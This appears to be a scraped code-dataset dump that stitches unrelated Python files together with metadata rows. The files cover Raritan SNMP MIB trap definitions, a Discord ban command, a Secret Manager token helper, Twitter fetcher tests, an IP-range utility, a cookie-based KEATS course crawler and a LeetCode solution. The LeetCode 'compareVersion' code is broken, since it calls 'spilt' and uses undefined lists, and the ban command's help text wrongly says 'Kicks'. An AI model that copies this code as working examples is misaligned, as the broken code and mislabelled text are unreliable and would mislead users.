assetTagDisconnected = NotificationType((1, 3, 6, 1, 4, 1, 13742, 7, 0, 2)).setObjects(("ASSETMANAGEMENT-MIB", "deviceName"), ("SNMPv2-MIB", "sysContact"), ("SNMPv2-MIB", "sysName"), ("SNMPv2-MIB", "sysLocation"), ("ASSETMANAGEMENT-MIB", "deviceInetAddressType"), ("ASSETMANAGEMENT-MIB", "deviceInetIPAddress"), ("ASSETMANAGEMENT-MIB", "agentInetPortNumber"), ("ASSETMANAGEMENT-MIB", "assetStripNumber"), ("ASSETMANAGEMENT-MIB", "assetStripName"), ("ASSETMANAGEMENT-MIB", "rackUnitNumber"), ("ASSETMANAGEMENT-MIB", "rackUnitPosition"), ("ASSETMANAGEMENT-MIB", "rackUnitName"), ("ASSETMANAGEMENT-MIB", "slotNumber"), ("ASSETMANAGEMENT-MIB", "tagID"), ("ASSETMANAGEMENT-MIB", "bladeTagID"), ("ASSETMANAGEMENT-MIB", "ledColor"), ("ASSETMANAGEMENT-MIB", "ledMode"), ("ASSETMANAGEMENT-MIB", "ledOperationMode"), ("ASSETMANAGEMENT-MIB", "rackUnitCount"), ("ASSETMANAGEMENT-MIB", "assetStripType"), ("ASSETMANAGEMENT-MIB", "assetStripCascadePosition"), ("ASSETMANAGEMENT-MIB", "rackUnitRelativePosition"), ("ASSETMANAGEMENT-MIB", "assetStripNumberOfRackUnits"))
if mibBuilder.loadTexts: assetTagDisconnected.setStatus('current')
if mibBuilder.loadTexts: assetTagDisconnected.setDescription('The asset tag of a rack unit was disconnected. bladeTagID is empty if the asset tag is not on a blade extension.')
assetStripStateChange = NotificationType((1, 3, 6, 1, 4, 1, 13742, 7, 0, 3)).setObjects(("ASSETMANAGEMENT-MIB", "deviceName"), ("SNMPv2-MIB", "sysContact"), ("SNMPv2-MIB", "sysName"), ("SNMPv2-MIB", "sysLocation"), ("ASSETMANAGEMENT-MIB", "deviceInetAddressType"), ("ASSETMANAGEMENT-MIB", "deviceInetIPAddress"), ("ASSETMANAGEMENT-MIB", "agentInetPortNumber"), ("ASSETMANAGEMENT-MIB", "assetStripNumber"), ("ASSETMANAGEMENT-MIB", "assetStripName"), ("ASSETMANAGEMENT-MIB", "assetStripState"), ("ASSETMANAGEMENT-MIB", "rackUnitCount"))
if mibBuilder.loadTexts: assetStripStateChange.setStatus('current')
if mibBuilder.loadTexts: assetStripStateChange.setDescription('The asset strip unit changed its state.')
assetStripFirmwareUpdate = NotificationType((1, 3, 6, 1, 4, 1, 13742, 7, 0, 4)).setObjects(("ASSETMANAGEMENT-MIB", "deviceName"), ("SNMPv2-MIB", "sysContact"), ("SNMPv2-MIB", "sysName"), ("SNMPv2-MIB", "sysLocation"), ("ASSETMANAGEMENT-MIB", "deviceInetAddressType"), ("ASSETMANAGEMENT-MIB", "deviceInetIPAddress"), ("ASSETMANAGEMENT-MIB", "agentInetPortNumber"), ("ASSETMANAGEMENT-MIB", "assetStripNumber"), ("ASSETMANAGEMENT-MIB", "assetStripName"), ("ASSETMANAGEMENT-MIB", "assetStripFirmwareUpdateState"))
if mibBuilder.loadTexts: assetStripFirmwareUpdate.setStatus('current')
if mibBuilder.loadTexts: assetStripFirmwareUpdate.setDescription('Asset strip firmware update state change.')
deviceConfigurationChanged = NotificationType((1, 3, 6, 1, 4, 1, 13742, 7, 0, 5)).setObjects(("ASSETMANAGEMENT-MIB", "deviceName"), ("SNMPv2-MIB", "sysContact"), ("SNMPv2-MIB", "sysName"), ("SNMPv2-MIB", "sysLocation"), ("ASSETMANAGEMENT-MIB", "deviceInetAddressType"), ("ASSETMANAGEMENT-MIB", "deviceInetIPAddress"), ("ASSETMANAGEMENT-MIB", "agentInetPortNumber"), ("ASSETMANAGEMENT-MIB", "deviceUserName"), ("ASSETMANAGEMENT-MIB", "assetStripNumber"), ("ASSETMANAGEMENT-MIB", "assetStripName"), ("ASSETMANAGEMENT-MIB", "deviceChangedParameter"), ("ASSETMANAGEMENT-MIB", "changedParameterNewValue"))
if mibBuilder.loadTexts: deviceConfigurationChanged.setStatus('current')
if mibBuilder.loadTexts: deviceConfigurationChanged.setDescription('Assetstrip configuration has changed')
rackUnitConfigurationChanged = NotificationType((1, 3, 6, 1, 4, 1, 13742, 7, 0, 6)).setObjects(("ASSETMANAGEMENT-MIB", "deviceName"), ("SNMPv2-MIB", "sysContact"), ("SNMPv2-MIB", "sysName"), ("SNMPv2-MIB", "sysLocation"), ("ASSETMANAGEMENT-MIB", "deviceInetAddressType"), ("ASSETMANAGEMENT-MIB", "deviceInetIPAddress"), ("ASSETMANAGEMENT-MIB", "agentInetPortNumber"), ("ASSETMANAGEMENT-MIB", "deviceUserName"), ("ASSETMANAGEMENT-MIB", "assetStripNumber"), ("ASSETMANAGEMENT-MIB", "assetStripName"), ("ASSETMANAGEMENT-MIB", "rackUnitNumber"), ("ASSETMANAGEMENT-MIB", "rackUnitPosition"), ("ASSETMANAGEMENT-MIB", "rackUnitName"), ("ASSETMANAGEMENT-MIB", "ledColor"), ("ASSETMANAGEMENT-MIB", "ledMode"), ("ASSETMANAGEMENT-MIB", "ledOperationMode"))
if mibBuilder.loadTexts: rackUnitConfigurationChanged.setStatus('current')
if mibBuilder.loadTexts: rackUnitConfigurationChanged.setDescription('Assetstrip configuration has changed')
bladeExtensionConnected = NotificationType((1, 3, 6, 1, 4, 1, 13742, 7, 0, 7)).setObjects(("ASSETMANAGEMENT-MIB", "deviceName"), ("SNMPv2-MIB", "sysContact"), ("SNMPv2-MIB", "sysName"), ("SNMPv2-MIB", "sysLocation"), ("ASSETMANAGEMENT-MIB", "deviceInetAddressType"), ("ASSETMANAGEMENT-MIB", "deviceInetIPAddress"), ("ASSETMANAGEMENT-MIB", "agentInetPortNumber"), ("ASSETMANAGEMENT-MIB", "assetStripNumber"), ("ASSETMANAGEMENT-MIB", "assetStripName"), ("ASSETMANAGEMENT-MIB", "rackUnitNumber"), ("ASSETMANAGEMENT-MIB", "rackUnitPosition"), ("ASSETMANAGEMENT-MIB", "rackUnitName"), ("ASSETMANAGEMENT-MIB", "tagID"), ("ASSETMANAGEMENT-MIB", "bladeExtensionSize"), ("ASSETMANAGEMENT-MIB", "ledColor"), ("ASSETMANAGEMENT-MIB", "ledMode"), ("ASSETMANAGEMENT-MIB", "ledOperationMode"), ("ASSETMANAGEMENT-MIB", "rackUnitCount"), ("ASSETMANAGEMENT-MIB", "assetStripType"), ("ASSETMANAGEMENT-MIB", "assetStripCascadePosition"), ("ASSETMANAGEMENT-MIB", "rackUnitRelativePosition"), ("ASSETMANAGEMENT-MIB", "assetStripNumberOfRackUnits"))
if mibBuilder.loadTexts: bladeExtensionConnected.setStatus('current')
if mibBuilder.loadTexts: bladeExtensionConnected.setDescription('A blade extension has been connected to the rackunit.')
bladeExtensionDisconnected = NotificationType((1, 3, 6, 1, 4, 1, 13742, 7, 0, 8)).setObjects(("ASSETMANAGEMENT-MIB", "deviceName"), ("SNMPv2-MIB", "sysContact"), ("SNMPv2-MIB", "sysName"), ("SNMPv2-MIB", "sysLocation"), ("ASSETMANAGEMENT-MIB", "deviceInetAddressType"), ("ASSETMANAGEMENT-MIB", "deviceInetIPAddress"), ("ASSETMANAGEMENT-MIB", "agentInetPortNumber"), ("ASSETMANAGEMENT-MIB", "assetStripNumber"), ("ASSETMANAGEMENT-MIB", "assetStripName"), ("ASSETMANAGEMENT-MIB", "rackUnitNumber"), ("ASSETMANAGEMENT-MIB", "rackUnitPosition"), ("ASSETMANAGEMENT-MIB", "rackUnitName"), ("ASSETMANAGEMENT-MIB", "tagID"), ("ASSETMANAGEMENT-MIB", "bladeExtensionSize"), ("ASSETMANAGEMENT-MIB", "ledColor"), ("ASSETMANAGEMENT-MIB", "ledMode"), ("ASSETMANAGEMENT-MIB", "ledOperationMode"), ("ASSETMANAGEMENT-MIB", "rackUnitCount"), ("ASSETMANAGEMENT-MIB", "assetStripType"), ("ASSETMANAGEMENT-MIB", "assetStripCascadePosition"), ("ASSETMANAGEMENT-MIB", "rackUnitRelativePosition"), ("ASSETMANAGEMENT-MIB", "assetStripNumberOfRackUnits"))
if mibBuilder.loadTexts: bladeExtensionDisconnected.setStatus('current')
if mibBuilder.loadTexts: bladeExtensionDisconnected.setDescription('A blade extension has been disconnected from the rackunit.')
bladeExtensionOverflowOccured = NotificationType((1, 3, 6, 1, 4, 1, 13742, 7, 0, 9)).setObjects(("ASSETMANAGEMENT-MIB", "deviceName"), ("SNMPv2-MIB", "sysContact"), ("SNMPv2-MIB", "sysName"), ("SNMPv2-MIB", "sysLocation"), ("ASSETMANAGEMENT-MIB", "deviceInetAddressType"), ("ASSETMANAGEMENT-MIB", "deviceInetIPAddress"), ("ASSETMANAGEMENT-MIB", "agentInetPortNumber"), ("ASSETMANAGEMENT-MIB", "assetStripNumber"), ("ASSETMANAGEMENT-MIB", "assetStripName"))
if mibBuilder.loadTexts: bladeExtensionOverflowOccured.setStatus('current')
if mibBuilder.loadTexts: bladeExtensionOverflowOccured.setDescription("Maximum number of supported tags on blade extension was reached. The asset strip won't detect any new tags on blade extensions until some are removed.")
bladeExtensionOverflowCleared = NotificationType((1, 3, 6, 1, 4, 1, 13742, 7, 0, 10)).setObjects(("ASSETMANAGEMENT-MIB", "deviceName"), ("SNMPv2-MIB", "sysContact"), ("SNMPv2-MIB", "sysName"), ("SNMPv2-MIB", "sysLocation"), ("ASSETMANAGEMENT-MIB", "deviceInetAddressType"), ("ASSETMANAGEMENT-MIB", "deviceInetIPAddress"), ("ASSETMANAGEMENT-MIB", "agentInetPortNumber"), ("ASSETMANAGEMENT-MIB", "assetStripNumber"), ("ASSETMANAGEMENT-MIB", "assetStripName"))
if mibBuilder.loadTexts: bladeExtensionOverflowCleared.setStatus('current')
if mibBuilder.loadTexts: bladeExtensionOverflowCleared.setDescription('Free space for new tags on blade extensions is available again.')
compositeAssetStripCompositionChanged = NotificationType((1, 3, 6, 1, 4, 1, 13742, 7, 0, 11)).setObjects(("ASSETMANAGEMENT-MIB", "deviceName"), ("SNMPv2-MIB", "sysContact"), ("SNMPv2-MIB", "sysName"), ("SNMPv2-MIB", "sysLocation"), ("ASSETMANAGEMENT-MIB", "deviceInetAddressType"), ("ASSETMANAGEMENT-MIB", "deviceInetIPAddress"), ("ASSETMANAGEMENT-MIB", "agentInetPortNumber"), ("ASSETMANAGEMENT-MIB", "assetStripNumber"), ("ASSETMANAGEMENT-MIB", "assetStripName"), ("ASSETMANAGEMENT-MIB", "oldNumberOfComponentAssetStrips"), ("ASSETMANAGEMENT-MIB", "numberOfComponentAssetStrips"))
if mibBuilder.loadTexts: compositeAssetStripCompositionChanged.setStatus('current')
if mibBuilder.loadTexts: compositeAssetStripCompositionChanged.setDescription('The composition of an composite asset strip changed.')
mibBuilder.exportSymbols("ASSETMANAGEMENT-MIB", bladeExtensionConnected=bladeExtensionConnected, logParentBladeID=logParentBladeID, assetManagement=assetManagement, assetStripFirmwareUpdate=assetStripFirmwareUpdate, assetStripDefaultLEDColorDisconnected=assetStripDefaultLEDColorDisconnected, deviceUserName=deviceUserName, compositeAssetStripCompositionChanged=compositeAssetStripCompositionChanged, compliances=compliances, assetStripConfigurationEntry=assetStripConfigurationEntry, logAssetStripNumber=logAssetStripNumber, rackUnitType=rackUnitType, rackUnitConfigurationChanged=rackUnitConfigurationChanged, assetStripDefaultLEDColorDisconnectedStr=assetStripDefaultLEDColorDisconnectedStr, logIndex=logIndex, assetManager=assetManager, assetStripNumberOfRackUnits=assetStripNumberOfRackUnits, assetStripName=assetStripName, defaultLEDColorDisconnectedStr=defaultLEDColorDisconnectedStr, AssetStripFirmwareUpdateStateEnumeration=AssetStripFirmwareUpdateStateEnumeration, rackUnitCount=rackUnitCount, numberOfComponentAssetStrips=numberOfComponentAssetStrips, assetTagConnected=assetTagConnected, configGroup2=configGroup2, traps=traps, LogEventTypeEnumeration=LogEventTypeEnumeration, oldestLogID=oldestLogID, logGroup=logGroup, rackUnitName=rackUnitName, ledMode=ledMode, assetManagementLogEntry=assetManagementLogEntry, trapInformationGroup=trapInformationGroup, complianceRev2=complianceRev2, currentMainTagCount=currentMainTagCount, currentBladeTagCount=currentBladeTagCount, bladeExtensionDisconnected=bladeExtensionDisconnected, logEventCount=logEventCount, conformance=conformance, maxMainTagCount=maxMainTagCount, bladeSlotID=bladeSlotID, logSize=logSize, bladeExtensionOverflow=bladeExtensionOverflow, defaultLEDColorConnectedStr=defaultLEDColorConnectedStr, raritan=raritan, assetManagementLogTable=assetManagementLogTable, ledOperationMode=ledOperationMode, assetManagementGroup=assetManagementGroup, AssetManagementLEDModeEnumeration=AssetManagementLEDModeEnumeration, RackUnitNumberingModeEnumeration=RackUnitNumberingModeEnumeration, bladeSlotPosition=bladeSlotPosition, configuration=configuration, assetStripStateChange=assetStripStateChange, defaultLEDColorConnected=defaultLEDColorConnected, assetStripID=assetStripID, assetStripType=assetStripType, tagFamily=tagFamily, logRackUnitNumber=logRackUnitNumber, deviceInetIPAddress=deviceInetIPAddress, rackUnitNumberingOffset=rackUnitNumberingOffset, assetStripConfigurationTable=assetStripConfigurationTable, assetStripState=assetStripState, assetManagementTable=assetManagementTable, assetTagDisconnected=assetTagDisconnected, configGroup=configGroup, assetStrip=assetStrip, slotNumber=slotNumber, log=log, assetStripDefaultLEDColorConnectedStr=assetStripDefaultLEDColorConnectedStr, logTimeStamp=logTimeStamp, deviceName=deviceName, logSlotNumber=logSlotNumber, RackUnitTypeEnumeration=RackUnitTypeEnumeration, trapsGroup=trapsGroup, AssetStripTypeEnumeration=AssetStripTypeEnumeration, assetStripDefaultLEDColorConnected=assetStripDefaultLEDColorConnected, tagID=tagID, logAssetStripState=logAssetStripState, PYSNMP_MODULE_ID=raritan, trapInformation=trapInformation, logEventType=logEventType, bladeTagID=bladeTagID, rackUnitID=rackUnitID, deviceInetAddressType=deviceInetAddressType, bladeExtensionEntry=bladeExtensionEntry, rackUnitNumberingMode=rackUnitNumberingMode, bladeExtensionSize=bladeExtensionSize, logConfiguration=logConfiguration, bladeExtensionOverflowOccured=bladeExtensionOverflowOccured, newestLogID=newestLogID, deviceConfigurationChanged=deviceConfigurationChanged, rackUnitRelativePosition=rackUnitRelativePosition, assetStripCascadePosition=assetStripCascadePosition, agentInetPortNumber=agentInetPortNumber, maxBladeTagCount=maxBladeTagCount, assetStripOrientation=assetStripOrientation, logTagID=logTagID, rackUnitNumber=rackUnitNumber, RGBCOLOR=RGBCOLOR, assetStripNumber=assetStripNumber, bladeExtensionTable=bladeExtensionTable, ledColor=ledColor, oldNumberOfComponentAssetStrips=oldNumberOfComponentAssetStrips, deviceChangedParameter=deviceChangedParameter, defaultLEDColorDisconnected=defaultLEDColorDisconnected, changedParameterNewValue=changedParameterNewValue, complianceRev1=complianceRev1, logRackUnitPosition=logRackUnitPosition, AssetStripOrientationEnumeration=AssetStripOrientationEnumeration, assetStripFirmwareUpdateState=assetStripFirmwareUpdateState, groups=groups, rackUnitPosition=rackUnitPosition, AssetManagementLEDOperationModeEnumeration=AssetManagementLEDOperationModeEnumeration, assetStripCount=assetStripCount, assetManagementEntry=assetManagementEntry, DeviceConfigurationParameterEnumeration=DeviceConfigurationParameterEnumeration, ledColorStr=ledColorStr, bladeExtensionOverflowCleared=bladeExtensionOverflowCleared, AssetStripStateEnumeration=AssetStripStateEnumeration)
| 157.773537
| 5,190
| 0.784856
| 3,608
| 0.058189
| 0
| 0
| 0
| 0
| 0
| 0
| 28,995
| 0.467624
|
8be140e08c2dfb6a0ad53e343aaf11199164a255
| 487
|
py
|
Python
|
secret.py
|
yoyu777/Poll-Bot
|
db239b42c5c5e1af38a7c0a12b977c38949f0724
|
[
"MIT"
] | null | null | null |
secret.py
|
yoyu777/Poll-Bot
|
db239b42c5c5e1af38a7c0a12b977c38949f0724
|
[
"MIT"
] | null | null | null |
secret.py
|
yoyu777/Poll-Bot
|
db239b42c5c5e1af38a7c0a12b977c38949f0724
|
[
"MIT"
] | null | null | null |
# Import the Secret Manager client library.
from google.cloud import secretmanager
# Create the Secret Manager client.
secretmanager_client = secretmanager.SecretManagerServiceClient()
def get_discord_token(project_id,secret_id):
latest_secret_version=secretmanager_client.access_secret_version(
name=f'projects/{project_id}/secrets/{secret_id}/versions/latest'
)
discord_bot_token = latest_secret_version.payload.data.decode("UTF-8")
return discord_bot_token
| 34.785714
| 74
| 0.804928
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 145
| 0.297741
|
8be594b734f337508a46bc13ebf1d32d3f8e6f53
| 1,663
|
py
|
Python
|
Bot/extensions/moderation/ban.py
|
ChrissisCodeXD/Hikari-TestProject
|
236c8fc9081172d9edff6d629e5d11c5abe64205
|
[
"MIT"
] | null | null | null |
Bot/extensions/moderation/ban.py
|
ChrissisCodeXD/Hikari-TestProject
|
236c8fc9081172d9edff6d629e5d11c5abe64205
|
[
"MIT"
] | null | null | null |
Bot/extensions/moderation/ban.py
|
ChrissisCodeXD/Hikari-TestProject
|
236c8fc9081172d9edff6d629e5d11c5abe64205
|
[
"MIT"
] | null | null | null |
from imports import *
ban_plugin = lightbulb.Plugin("moderation.ban")
ban_plugin.add_checks(
lightbulb.checks.guild_only,
lightbulb.checks.bot_has_guild_permissions(hikari.Permissions.BAN_MEMBERS),
lightbulb.checks.has_guild_permissions(hikari.Permissions.BAN_MEMBERS),
)
@ban_plugin.command()
@lightbulb.check_exempt(utils.mod_check)
@lightbulb.option("reason", "The Reason for kicking the Member", str, required=False)
@lightbulb.option("member", "Kicks the given Member", hikari.Member, required=True)
@lightbulb.command("ban", "Kicks the given Member")
@lightbulb.implements(lightbulb.UserCommand, lightbulb.SlashCommand, lightbulb.PrefixCommand, lightbulb.MessageCommand)
async def ban(ctx: lightbulb.Context) -> None:
if type(ctx) == lightbulb.context.UserContext:
user = ctx.options.target
elif type(ctx) == lightbulb.context.MessageContext:
user = ctx.options.target.author
else:
user = ctx.options.member
flags = []
if ctx.interaction:
flags.append(hikari.MessageFlag.EPHEMERAL)
res = ctx.options.reason or f"'No Reason Provided.' By {ctx.author}"
await ban_member(user, ctx.get_guild(), res)
if not flags:
await ctx.respond(f"Banning **{user}**")
if not flags:
await ctx.edit_last_response(f"Succesfully banned `{user}` for `{res}`!")
else:
await ctx.respond(f"Succesfully banned `{user}` for `{res}`!", flags=flags[0])
async def ban_member(user, guild, res):
await ban_plugin.bot.rest.ban_member(user=user, guild=guild, reason=res)
def load(bot):
bot.add_plugin(ban_plugin)
def unload(bot):
bot.remove_plugin(ban_plugin)
| 33.938776
| 119
| 0.719784
| 0
| 0
| 0
| 0
| 1,154
| 0.693927
| 865
| 0.520144
| 267
| 0.160553
|
8be59cb6314fe38c5f76d083bb061587be243807
| 2,043
|
py
|
Python
|
trend_analyze/test/test_fecth_data_from_api.py
|
popper2710/Trend_Analyze
|
0c98bcd7986bdb2d2b9bdc8022bfa08ddf0e7b0f
|
[
"MIT"
] | null | null | null |
trend_analyze/test/test_fecth_data_from_api.py
|
popper2710/Trend_Analyze
|
0c98bcd7986bdb2d2b9bdc8022bfa08ddf0e7b0f
|
[
"MIT"
] | 2
|
2020-09-26T14:58:33.000Z
|
2021-03-31T20:01:40.000Z
|
trend_analyze/test/test_fecth_data_from_api.py
|
popper2710/Trend_Analyze
|
0c98bcd7986bdb2d2b9bdc8022bfa08ddf0e7b0f
|
[
"MIT"
] | null | null | null |
import unittest
from trend_analyze.config import *
from trend_analyze.src.model import *
from trend_analyze.src.fetch_data_from_api import ApiTwitterFetcher
class TestFetchDataFromApi(unittest.TestCase):
"""
test class for fetch_data_from_api.py
"""
def __init__(self, *args, **kwargs):
super(TestFetchDataFromApi, self).__init__(*args, **kwargs)
self.atf = ApiTwitterFetcher(quiet=True)
def setUp(self) -> None:
os.environ['TREND_ANALYZE_ENV'] = 'test'
def tearDown(self) -> None:
os.environ['TREND_ANALYZE_ENV'] = TREND_ANALYZE_ENV
def test_fetch_followed_list(self):
follower = self.atf._fetch_followed_list(TEST_USERNAME)
self.assertIsInstance(follower[0], User)
def test_fetch_following_list(self):
following = self.atf._fetch_followed_list(TEST_USERNAME)
self.assertIsInstance(following[0], User)
def test_fetch_user_relations(self):
user_relations = self.atf.fetch_user_relations(TEST_USERNAME)
self.assertIsInstance(user_relations[0], UserRelation)
def test_fetch_user_info(self):
user = self.atf.fetch_user_info(TEST_USER_ID)
self.assertEqual(user.user_id, TEST_USER_ID)
def test_fetch_user_tweet(self):
user_tweet = self.atf.fetch_user_tweet(TEST_USER_ID)
for i in user_tweet:
self.assertEqual(i[0].user.user_id, TEST_USER_ID)
break
def test_fetch_tweet_including_target(self):
tweet = self.atf.fetch_tweet_including_target("TEST", is_RT=True, is_name=True)
for i in tweet:
self.assertIn("test", i[0].text.lower())
break
def test_fetch_trend_availables(self):
trend_availables = self.atf.fetch_trends_available()
self.assertEqual(trend_availables[0]['name'], "Worldwide")
def test_fetch_current_trends(self):
trends = self.atf.fetch_current_trends(JAPAN_WOEID)
self.assertNotEqual(trends[0]['trends'], [])
if __name__ == '__main__':
unittest.main()
| 32.951613
| 87
| 0.698972
| 1,833
| 0.89721
| 0
| 0
| 0
| 0
| 0
| 0
| 144
| 0.070485
|
8be760a4114acf5a4db49d05c1ef322eef5d00e1
| 1,779
|
py
|
Python
|
leetcode/easy/compare-version-numbers.py
|
rainzhop/cumulus-tank
|
09ebc7858ea53630e30606945adfea856a80faa3
|
[
"MIT"
] | null | null | null |
leetcode/easy/compare-version-numbers.py
|
rainzhop/cumulus-tank
|
09ebc7858ea53630e30606945adfea856a80faa3
|
[
"MIT"
] | null | null | null |
leetcode/easy/compare-version-numbers.py
|
rainzhop/cumulus-tank
|
09ebc7858ea53630e30606945adfea856a80faa3
|
[
"MIT"
] | null | null | null |
# https://leetcode.com/problems/compare-version-numbers/
#
# Compare two version numbers version1 and version2.
# If version1 > version2 return 1, if version1 < version2 return -1, otherwise return 0.
#
# You may assume that the version strings are non-empty and contain only digits and the . character.
# The . character does not represent a decimal point and is used to separate number sequences.
# For instance, 2.5 is not "two and a half" or "half way to version three",
# it is the fifth second-level revision of the second first-level revision.
#
# Here is an example of version numbers ordering:
# 0.1 < 1.1 < 1.2 < 13.37
#
# Credits:
# Special thanks to @ts for adding this problem and creating all test cases.
class Solution(object):
def compareVersion(self, version1, version2):
"""
:type version1: str
:type version2: str
:rtype: int
"""
for d in version1.spilt('.'):
d = d.lstrip('0')
if d == "":
d = "0"
v1.append(eval(d))
for d in version2.spilt('.'):
d = d.lstrip('0')
if d == "":
d = "0"
v2.append(eval(d))
v1Len = len(v1)
v2Len = len(v2)
for i in xrange(min(v1Len, v2Len)):
d1 = v1[i]
d2 = v2[i]
if d1 < d2:
return -1
elif d1 > d2:
return 1
if v1Len < v2Len:
for d in v2[v1Len:]:
if d != 0: break
else:
return 0
return -1
elif v1Len > v2Len:
for d in v1[v2Len:]:
if d != 0: break
else:
return 0
return 1
else:
return 0
| 30.152542
| 100
| 0.518269
| 1,058
| 0.594716
| 0
| 0
| 0
| 0
| 0
| 0
| 817
| 0.459247
|
8be7873229c136c3351120aeb123d5e799820294
| 710
|
py
|
Python
|
utils.py
|
florenthemmi/ips-by-country
|
2f63ec2108ceaae97221de52654753c545733d84
|
[
"MIT"
] | 1
|
2021-05-24T06:16:49.000Z
|
2021-05-24T06:16:49.000Z
|
utils.py
|
florenthemmi/ips-by-country
|
2f63ec2108ceaae97221de52654753c545733d84
|
[
"MIT"
] | null | null | null |
utils.py
|
florenthemmi/ips-by-country
|
2f63ec2108ceaae97221de52654753c545733d84
|
[
"MIT"
] | null | null | null |
from datetime import datetime
from config import CIDR_MAX_SUBNETS
class IPRange(object):
def __init__(self, data):
self.range_start = data[0]
self.range_end = data[1]
self.total_ips = int(data[2])
self.assign_date = datetime.strptime(data[3], '%d/%m/%y')
self.owner = data[4]
self.cidr = IPRange.get_cidr(self.range_start, self.total_ips)
@staticmethod
def get_cidr(range_start, total_ips):
mask = CIDR_MAX_SUBNETS.get(total_ips, None)
if not mask:
return None
return '{}/{}'.format(range_start, CIDR_MAX_SUBNETS[total_ips])
def __str__(self):
return '{}'.format(self.cidr or self.range_start)
| 26.296296
| 71
| 0.640845
| 640
| 0.901408
| 0
| 0
| 227
| 0.319718
| 0
| 0
| 21
| 0.029577
|
8be7899428e46960e100ad08d01429e3242a6f7d
| 4,897
|
py
|
Python
|
keats_crawler/crawl.py
|
mannmann2/keats-crawler
|
9fc108b75e63bf3dfac0c18ed2f0bec84d003c14
|
[
"MIT"
] | 8
|
2021-01-21T19:34:59.000Z
|
2022-02-14T23:09:48.000Z
|
keats_crawler/crawl.py
|
mannmann2/keats-crawler
|
9fc108b75e63bf3dfac0c18ed2f0bec84d003c14
|
[
"MIT"
] | null | null | null |
keats_crawler/crawl.py
|
mannmann2/keats-crawler
|
9fc108b75e63bf3dfac0c18ed2f0bec84d003c14
|
[
"MIT"
] | 1
|
2021-12-27T11:09:44.000Z
|
2021-12-27T11:09:44.000Z
|
"""Main module."""
from config import *
import os
import re
from threading import Thread
import requests
from urllib.parse import unquote
from bs4 import BeautifulSoup
from m3u8downloader.main import M3u8Downloader
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
VIDEO_DICT = {}
PATH = f'{PATH}{MODULE}/'
if not os.path.exists(PATH):
print('Creating directory at', PATH)
os.makedirs(PATH)
options = Options()
if HEADLESS:
options.add_argument("--headless")
driver = webdriver.Chrome(PATH_TO_CHROMEDRIVER, options=options)
def is_duplicate(href, anchor):
code = href.split('=')[-1]
file = f'{code} - {MODULE}/{anchor}\n'
with open('duplicates.txt', 'r') as f:
files = f.readlines()
if file in files:
return True
return False
def remember(url, anchor):
code = url.split('=')[-1]
file = f'{code} - {MODULE}/{anchor}'
with open('duplicates.txt', 'a') as f:
f.write(file + '\n')
def res_download(url, anchor):
if REMEMBER_DOWNLOADS:
remember(url, anchor)
try:
res = requests.get(url + '&redirect=1', timeout=10, cookies=COOKIE_DICT)
except requests.exceptions.Timeout:
print('timeout...')
return
name = unquote(res.url.split('/')[-1])
name = re.sub(r'[\\/:*?"<>|]', '.', name)
if anchor.endswith('URL') and not name.endswith('.pdf'):
print(f'--- {name} ... skipping')
return
with open(f'{PATH}{name}', 'wb') as f:
f.write(res.content)
print(f'--- {name} ... Done')
def parse_frame(iframe):
driver.switch_to.frame(iframe)
video_frame = driver.find_element_by_xpath("//iframe[@name='kplayer_ifp']")
driver.switch_to.frame(video_frame)
src = driver.page_source.replace('\n', ' ')
soup = BeautifulSoup(src, 'html.parser')
name = soup.find('title').text
match = re.search('\<video.*?\</video>', src)
soup2 = BeautifulSoup(match.group(0), 'html.parser')
m3u8 = soup2.find('video')['src'].split('?')[0]
driver.switch_to.default_content()
return name, m3u8
def vid_download(name, m3u8):
name_ = re.sub(r'[\\/:*?"<>|]', '.', name)
path = f'{PATH}{name_}.mp4'
M3u8Downloader(m3u8, path).start()
print(f'--- {name} ... Done')
def run():
print('Starting...')
driver.get('https://keats.kcl.ac.uk/my')
for k, v in COOKIE_DICT.items():
driver.add_cookie({'name': k, 'value': v})
driver.get(URLS[MODULE])
soup = BeautifulSoup(driver.page_source.replace('\n', ' '), 'html.parser')
links = soup.find_all('a', class_='aalink')
if SKIP_DUPLICATES:
vid_links = [(link.text, link['href']) for link in links if '/kalvid' in link.get('href', '') and not is_duplicate(link['href'], link.text)]
res_links = [(link.text, link['href']) for link in links if '/resource' in link.get('href', '') and not is_duplicate(link['href'], link.text)]
url_links = [(link.text, link['href']) for link in links if '/mod/url' in link.get('href', '') and not is_duplicate(link['href'], link.text)]
else:
vid_links = [(link.text, link['href']) for link in links if '/kalvid' in link.get('href', '')]
res_links = [(link.text, link['href']) for link in links if '/resource' in link.get('href', '')]
url_links = [(link.text, link['href']) for link in links if '/mod/url' in link.get('href', '')]
if DOWNLOAD_RESOURCES:
print('Downloading...', len(res_links), 'resources')
threads = []
for i, (anchor, url) in enumerate(res_links + url_links):
th = Thread(target=res_download, args=(url, anchor))
th.start()
threads.append(th)
for th in threads:
th.join()
print('Done')
if DOWNLOAD_VIDEOS:
if VIDEO_LIMIT:
vid_links = vid_links[:VIDEO_LIMIT]
print('Found', len(vid_links), 'videos')
print('Extracting video links...')
ch = 'y'
for i, (anchor, url) in enumerate(vid_links):
if VIDEO_PROMPT:
ch = input(f'Download {anchor}? (y/n) ')
if ch in ['y', 'Y']:
driver.get(url)
iframe = driver.find_element_by_xpath("//iframe[@class='mwEmbedKalturaIframe'] | //iframe[@id='contentframe']")
name, m3u8 = parse_frame(iframe)
VIDEO_DICT[name] = (m3u8, url, anchor)
# threads = []
for name, (m3u8, url, anchor) in VIDEO_DICT.items():
vid_download(name, m3u8)
if REMEMBER_DOWNLOADS:
remember(url, anchor)
# th = Thread(target=vid_download, args=(name, m3u8))
# th.start()
# threads.append(th)
# for th in threads:
# th.join()
print('Done')
driver.quit()
if __name__ == '__main__':
run()
| 27.357542
| 150
| 0.588115
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,063
| 0.217072
|
8be7a3c80ff1ca3e87607f2cacd6a9420c5e831e
| 7,305
|
py
|
Python
|
logging_with_arcpy.py
|
Kortforsyningen/logging-with-arcpy
|
b227aea9c377ca6e98b2c398d294c08bce506f84
|
[
"MIT"
] | 1
|
2022-03-03T13:20:12.000Z
|
2022-03-03T13:20:12.000Z
|
logging_with_arcpy.py
|
Kortforsyningen/logging-with-arcpy
|
b227aea9c377ca6e98b2c398d294c08bce506f84
|
[
"MIT"
] | null | null | null |
logging_with_arcpy.py
|
Kortforsyningen/logging-with-arcpy
|
b227aea9c377ca6e98b2c398d294c08bce506f84
|
[
"MIT"
] | 1
|
2022-03-30T11:33:43.000Z
|
